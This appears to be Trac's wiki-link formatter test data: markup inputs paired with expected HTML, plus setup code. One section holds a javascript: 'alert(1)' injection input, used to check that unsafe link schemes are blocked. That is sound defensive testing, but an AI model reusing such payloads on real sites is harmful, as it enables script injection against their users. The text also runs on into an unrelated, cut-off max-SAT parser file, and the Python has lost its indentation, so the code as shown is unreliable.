[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
</p>
------------------------------
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
============================== MoinMoin style forced links
This is a ["Wiki"] page link.
This is a ["Wiki" wiki page] link with label.
This is a ["Wiki?param=1#fragment"] page link with query and fragment.
------------------------------
<p>
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">Wiki</a> page link.
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">wiki page</a> link with label.
This is a <a class="missing wiki" href="/wiki/Wiki?param=1#fragment" rel="nofollow">Wiki</a> page link with query and fragment.
</p>
------------------------------
============================== Wiki links with @version
wiki:page@12
WikiStart@12
WikiStart@12#heading
[WikiStart@12]
[WikiStart@12#heading]
This is a ["Wiki@12"] page link.
[wiki:WikiStart@12?format=txt v12 as text]
------------------------------
<p>
<a class="missing wiki" href="/wiki/page?version=12" rel="nofollow">wiki:page@12</a>
<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>
<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>
[<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>]
[<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>]
This is a <a class="missing wiki" href="/wiki/Wiki?version=12" rel="nofollow">Wiki@12</a> page link.
<a class="wiki" href="/wiki/WikiStart?version=12&format=txt">v12 as text</a>
</p>
------------------------------
============================== WikiPageName with label
See details of the [WikiPageNames wiki page name] syntax.
Here's a [BadExample\fbad] example with special whitespace.
We can also [WikiLabels '"use [quotes]"']
or [WikiLabels "'use [quotes]'"]
------------------------------
<p>
See details of the <a class="missing wiki" href="/wiki/WikiPageNames" rel="nofollow">wiki page name</a> syntax.
Here's a <a class="missing wiki" href="/wiki/BadExample" rel="nofollow">bad</a> example with special whitespace.
We can also <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">"use [quotes]"</a>
or <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">'use [quotes]'</a>
</p>
------------------------------
============================== WikiPageName with label should be strict...
new_channel_name [, '''integer''' handle [, '''boolean''' test]]
------------------------------
<p>
new_channel_name [, <strong>integer</strong> handle [, <strong>boolean</strong> test]]
</p>
------------------------------
============================== InterTrac for wiki
t:wiki:InterTrac
trac:wiki:InterTrac
TRAC:wiki:InterTrac
[t:wiki:InterTrac intertrac]
[trac:wiki:InterTrac intertrac]
[trac:wiki:JonasBorgström jonas]
[TRAC:wiki:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>t:wiki:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>trac:wiki:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>TRAC:wiki:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AJonasBorgstr%C3%B6m" title="wiki:JonasBorgström in The Trac Project"><span class="icon"></span>jonas</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/wiki%3AJonasBorgstr%C3%B6m" title="wiki:JonasBorgström in The Trac Project"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== Wiki InterTrac shorthands
t:InterTrac
trac:InterTrac
TRAC:InterTrac
[t:InterTrac intertrac]
[trac:InterTrac intertrac]
[trac:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>t:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>trac:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>TRAC:InterTrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in The Trac Project"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="https://trac.edgewall.org/intertrac/JonasBorgstr%C3%B6m" title="JonasBorgström in The Trac Project"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== InterWiki links
This is the original MeatBall:InterMapTxt wiki page.
Checkout the [tsvn:http://svn.edgewall.com/repos/trac Trac Repository].
complex link complex:a:test with positional arguments
complex link complex:a (not enough arguments)
complex link complex:a:test:more (too many arguments)
in trac.ini inter:b:resource
in trac.ini over:c:something overrides wiki
NoLink:ignored
NoLink:
NoLink: ...
------------------------------
<p>
This is the original <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt</a> wiki page.
Checkout the <a class="ext-link" href="tsvn:http://svn.edgewall.com/repos/trac" title="http://svn.edgewall.com/repos/trac in tsvn"><span class="icon"></span>Trac Repository</a>.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt" title="resource test in a"><span class="icon"></span>complex:a:test</a> with positional arguments
complex link <a class="ext-link" href="http://server/a/page/?format=txt" title="resource in a"><span class="icon"></span>complex:a</a> (not enough arguments)
complex link <a class="ext-link" href="http://server/a/page/test:more?format=txt" title="resource test:more in a"><span class="icon"></span>complex:a:test:more</a> (too many arguments)
</p>
<p>
in trac.ini <a class="ext-link" href="http://inter/b/page/resource" title="Resource resource in b"><span class="icon"></span>inter:b:resource</a>
in trac.ini <a class="ext-link" href="http://over/c/page/something" title="c:something in over"><span class="icon"></span>over:c:something</a> overrides wiki
</p>
<p>
NoLink:ignored
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink</a>:
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink</a>: ...
</p>
------------------------------
============================== InterWiki links with parameters and fragment
See also MeatBall:InterMapTxt#there wiki page
and MeatBall:InterMapTxt?format=txt#there wiki page.
complex link complex:a:test?go#there with positional arguments
------------------------------
<p>
See also <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt#there</a> wiki page
and <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt&format=txt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt?format=txt#there</a> wiki page.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt&go#there" title="resource test in a"><span class="icon"></span>complex:a:test?go#there</a> with positional arguments
</p>
------------------------------
============================== Regression for #9712
This is not a link: x,://localhost
------------------------------
<p>
This is not a link: x,:<em>localhost
</em></p>
------------------------------
============================== Wiki links with @version using unicode digits
WikiStart@₄₂
WikiStart@₄₂#heading
[WikiStart@₄₂]
[WikiStart@₄₂#heading]
------------------------------
<p>
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂]
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading]
</p>
------------------------------
""" #" Emacs likes it that way better
RELATIVE_LINKS_TESTS = u"""
============================== Relative to the project url
[//docs Documentation]
[//docs?param=1#fragment Documentation]
[//docs]
[//docs //docs]
[//docs?param=1#fragment]
[// Home]
[//]
[//?param=1#fragment]
------------------------------
<p>
<a href="/docs">Documentation</a>
<a href="/docs?param=1#fragment">Documentation</a>
<a href="/docs">docs</a>
<a href="/docs">//docs</a>
<a href="/docs?param=1#fragment">docs</a>
<a href="/">Home</a>
<a href="/">//</a>
<a href="/?param=1#fragment">//</a>
</p>
------------------------------
============================== Relative to the base url
[/newticket?priority=high#fragment bug]
[/newticket?priority=high#fragment]
[/newticket]
[/newticket /newticket]
[/ Project]
[/]
[/?param=1#fragment]
------------------------------
<p>
<a href="/newticket?priority=high#fragment">bug</a>
<a href="/newticket?priority=high#fragment">newticket</a>
<a href="/newticket">newticket</a>
<a href="/newticket">/newticket</a>
<a href="/">Project</a>
<a href="/">/</a>
<a href="/?param=1#fragment">/</a>
</p>
------------------------------
============================== Relative to the current page
[.]
[./]
[..]
[../]
[./../.]
[. this page]
[./Detail see detail]
[./Detail]
[./Detail ./Detail]
[.. see parent]
[../Other see other]
[../Other]
[../Other ../Other]
[.././../Other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub">./</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">../</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">./../.</a>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">../Other</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other</a>
</p>
------------------------------
============================== Relative to the current page, in wiki realm
[wiki:. this page]
[wiki:./Detail]
[wiki:"./Detail"]
[wiki:./Detail ./Detail]
[wiki:./Detail see detail]
[wiki:.. see parent]
[wiki:../Other see other]
[wiki:.././../Other]
["."]
[".?param=1#fragment"]
["./Detail"]
["./Detail?param=1#fragment"]
[".."]
["..?param=1#fragment"]
["../Other"]
["../Other?param=1#fragment"]
[".././../Other"]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other</a>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#fragment">.</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#fragment" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..</a>
<a class="missing wiki" href="/wiki/Main?param=1#fragment" rel="nofollow">..</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#fragment" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other</a>
</p>
------------------------------
============================== Relative to the current page, as CamelCase
OnePage/SubPage
./SubPage
../SiblingPage
.././../HigherPage
/TopPage
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/OnePage/SubPage" rel="nofollow">OnePage/SubPage</a>
<a class="missing wiki" href="/wiki/Main/Sub/SubPage" rel="nofollow">./SubPage</a>
<a class="missing wiki" href="/wiki/Main/SiblingPage" rel="nofollow">../SiblingPage</a>
<a class="missing wiki" href="/wiki/HigherPage" rel="nofollow">.././../HigherPage</a>
<a class="missing wiki" href="/wiki/TopPage" rel="nofollow">/TopPage</a>
</p>
------------------------------
============================== Relative to the current page with query strings and fragments
[#topic see topic]
[?param=1#topic see topic]
[.#topic see topic]
[.?param=1#topic see topic]
[./#topic see topic]
[./?param=1#topic see topic]
[./Detail#topic see detail]
[./Detail?param=1#topic see detail]
[./Detail?param=1#topic]
[..#topic see parent]
[..?param=1#topic see parent]
[../#topic see parent]
[../?param=1#topic see parent]
[../Other#topic see other]
[../Other?param=1#topic see other]
[../Other?param=1#topic]
[../Other/#topic see other]
[../Other/?param=1#topic see other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail#topic" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">see detail</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">Detail</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">Other</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other</a>
</p>
------------------------------
""" # "
SPLIT_PAGE_NAMES_TESTS = u"""
============================== Splitting relative links
[//WikiPage]
[/WikiPage]
[./WikiPage]
[../WikiPage]
[//WikiPage?param=1#fragment]
[/WikiPage?param=1#fragment]
[./WikiPage?param=1#fragment]
[../WikiPage?param=1#fragment]
But not [./wiki_page]
And not [../WikiPage WikiPage]
------------------------------
<p>
<a href="/WikiPage">Wiki Page</a>
<a href="/WikiPage">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage</a>
</p>
------------------------------
============================== Splitting scoped links
[wiki:WikiPage]
[wiki:./WikiPage]
[wiki:../WikiPage]
[wiki:./.././WikiPage]
[wiki:"./.././WikiPage"]
[wiki:WikiPage?param=1#fragment]
[wiki:./WikiPage?param=1#fragment]
[wiki:../WikiPage?param=1#fragment]
But not [wiki:./wiki_page]
And not [wiki:../WikiPage WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage</a>
</p>
------------------------------
============================== Splitting internal free links
["WikiPage"]
["./WikiPage"]
["../WikiPage"]
["./.././WikiPage"]
["WikiPage?param=1#fragment"]
["./WikiPage?param=1#fragment"]
["../WikiPage?param=1#fragment"]
But not ["./wiki_page"]
And not ["../WikiPage" WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage</a>
</p>
------------------------------
""" # "
SCOPED_LINKS_TESTS = u"""
============================== Scoped links for hierarchical pages
ThirdLevel
[wiki:ThirdLevel]
OtherThirdLevel
[wiki:OtherThirdLevel]
SecondLevel/OtherThirdLevel
[wiki:SecondLevel/OtherThirdLevel]
SecondLevel
[wiki:SecondLevel]
FirstLevel
[wiki:FirstLevel]
TestPage
[wiki:TestPage]
MissingPage
[wiki:MissingPage]
FirstLevel/MissingPage
[wiki:FirstLevel/MissingPage]
SecondLevel/MissingPage
[wiki:SecondLevel/MissingPage]
MissingFirstLevel/MissingPage
[wiki:MissingFirstLevel/MissingPage]
["/OtherThirdLevel"]
[wiki:/OtherThirdLevel]
[wiki:/OtherThirdLevel /OtherThirdLevel]
------------------------------
<p>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/ThirdLevel">ThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel/OtherThirdLevel">SecondLevel/OtherThirdLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel/SecondLevel">SecondLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/FirstLevel">FirstLevel</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/MissingPage" rel="nofollow">FirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingPage" rel="nofollow">SecondLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/FirstLevel/SecondLevel/MissingFirstLevel/MissingPage" rel="nofollow">MissingFirstLevel/MissingPage</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">OtherThirdLevel</a>
<a class="missing wiki" href="/wiki/OtherThirdLevel" rel="nofollow">/OtherThirdLevel</a>
</p>
------------------------------
""" # "
SAFE_INTERWIKI_TESTS = u"""
============================== InterWiki with safe_schemes
This is the original MeatBall:InterMapTxt wiki page.
Checkout the [tsvn:http://svn.edgewall.com/repos/trac Trac Repository].
complex link complex:a:test with positional arguments.
js:"alert(1)" javasc:"ript:alert(1)"
------------------------------
<p>
This is the original <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt</a> wiki page.
</p>
<p>
Checkout the <a class="ext-link" href="tsvn:http://svn.edgewall.com/repos/trac" title="http://svn.edgewall.com/repos/trac in tsvn"><span class="icon"></span>Trac Repository</a>.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt" title="resource test in a"><span class="icon"></span>complex:a:test</a> with positional arguments.
</p>
<p>
js:"alert(1)" javasc:"ript:alert(1)"
</p>
------------------------------
""" # "
def wiki_setup(tc):
tc.env.config.set('wiki', 'render_unsafe_content', True) # for #9712
now = datetime_now(utc)
wiki0 = WikiPage(tc.env)
wiki0.name = 'Main/Sub'
wiki0.text = '--'
wiki0.save('joe', 'subpage', now)
wiki1 = WikiPage(tc.env)
wiki1.name = 'TestPage'
wiki1.text = '--'
wiki1.save('joe', 'normal WikiPageNames', now)
wiki2 = WikiPage(tc.env)
wiki2.name = 'Space 1 23'
wiki2.text = '--'
wiki2.save('joe', 'not a WikiPageNames', now)
wiki3 = WikiPage(tc.env)
wiki3.name = u"C'est l'\xe9t\xe9"
wiki3.text = '--'
wiki3.save('joe', 'unicode WikiPageNames', now)
imt = WikiPage(tc.env)
imt.name = u"InterMapTxt"
imt.text = """
This is the InterMapTxt
----
{{{
MeatBall http://www.usemod.com/cgi-bin/mb.pl? # $1 in MeatBall...
tsvn tsvn:
complex http://server/$1/page/$2?format=txt # resource $2 in $1
over http://unused/? # Overridden in trac.ini
js javascript:
javasc javasc
}}}
----
{{{
nolink http://noweb
}}}
"""
imt.save('joe', 'test InterWiki links', now)
tc.env.config.set('interwiki', 'inter',
'http://inter/$1/page/$2 Resource $2 in $1')
tc.env.config.set('interwiki', 'over',
'http://over/$1/page/$2')
w = WikiPage(tc.env)
w.name = 'FirstLevel'
w.text = '--'
w.save('joe', 'first level of hierarchy', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel'
w.text = '--'
w.save('joe', 'second level of hierarchy', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/ThirdLevel'
w.text = '--'
w.save('joe', 'third level of hierarchy', now)
w = WikiPage(tc.env)
w.name = 'FirstLevel/SecondLevel/OtherThirdLevel'
w.text = '--'
w.save('joe', 'other third level of hierarchy', now)
tc.env.db_transaction("INSERT INTO ticket (id) VALUES ('123')")
def wiki_teardown(tc):
tc.env.reset_db()
def wiki_setup_split(tc):
tc.env.config.set('wiki', 'split_page_names', 'true')
wiki_setup(tc)
def wiki_setup_safe_interwiki(tc):
wiki_setup(tc)
tc.env.config.set('wiki', 'render_unsafe_content', 'false')
tc.env.config.set('wiki', 'safe_schemes',
'file,ftp,git,irc,http,https,ssh,svn,tsvn')
def test_suite():
suite = unittest.TestSuite()
suite.addTest(formatter.test_suite(TEST_CASES, wiki_setup, __file__,
wiki_teardown))
suite.addTest(formatter.test_suite(RELATIVE_LINKS_TESTS, wiki_setup,
__file__,
wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.test_suite(SPLIT_PAGE_NAMES_TESTS,
wiki_setup_split,
__file__, wiki_teardown,
context=('wiki', 'Main/Sub')))
suite.addTest(formatter.test_suite(SCOPED_LINKS_TESTS, wiki_setup,
__file__, wiki_teardown,
context=('wiki', 'FirstLevel/Second'
'Level/ThirdLevel')))
suite.addTest(formatter.test_suite(SAFE_INTERWIKI_TESTS,
wiki_setup_safe_interwiki, __file__,
wiki_teardown))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| 45.35206 | 347 | 0.633936 |
734529ea0b7a3abd2db8e2192f628ba6a86ecfb1
| 6,858 |
py
|
Python
|
examples/qaoa/parse_raw_sat.py
|
sourcery-ai-bot/professional-services
|
0dd87e18560894bc68c05b580c6c9f2322eabc47
|
[
"Apache-2.0"
] | null | null | null |
examples/qaoa/parse_raw_sat.py
|
sourcery-ai-bot/professional-services
|
0dd87e18560894bc68c05b580c6c9f2322eabc47
|
[
"Apache-2.0"
] | null | null | null |
examples/qaoa/parse_raw_sat.py
|
sourcery-ai-bot/professional-services
|
0dd87e18560894bc68c05b580c6c9f2322eabc47
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module to parse maxSAT problems from files."""
import argparse
from collections import namedtuple
import os
import re
import numpy as np
from qubo import QuboProblem
# constrains are in form like 'R4:-X3+X6-X0+X5>=-1'
_CONSTRAINT_RE = re.compile(r'R[0-9]+:(-?(?:X[0-9]+[+-])*X[0-9]+)>=(-?[0-9]+)')
_VARIABLE_RE = re.compile(r'[+-]?X[0-9]+')
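# Example: 'R4:-X3+X6-X0+X5>=-1' matches _CONSTRAINT_RE with groups
# ('-X3+X6-X0+X5', '-1'); _VARIABLE_RE then splits the first group into
# ['-X3', '+X6', '-X0', '+X5'].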
class Sat(namedtuple('_Sat', ['clauses', 'num_vars', 'source_filename'])):
"""A named tuple that represents a max-SAT problem.
Attributes:
clauses: list of Clauses
        num_vars: number of variables
        source_filename: the path to the source file (Daimler's format)
"""
def _check_clause(self, clause, solution):
for el in clause:
s = solution[abs(el) - 1]
if el > 0 and s == 1:
return True
if el < 0 and s == 0:
return True
return False
def check(self, solution):
"""Check a given solution for this SAT problem.
Returns:
            The number of satisfied clauses.
"""
return sum(self._check_clause(x, solution) for x in self.clauses)
class Clause(list):
"""A list that represents one clause in CNF form.
    A Clause consists of nonzero ints; every int represents a variable.
Negative ints represent negation.
A variable can't be both in a positive and negative form in one clause.
"""
def __init__(self, *args, **kwargs):
super(Clause, self).__init__(*args, **kwargs)
self._check()
def _check(self):
abs_vars = [abs(el) for el in self]
if len(set(abs_vars)) != len(self):
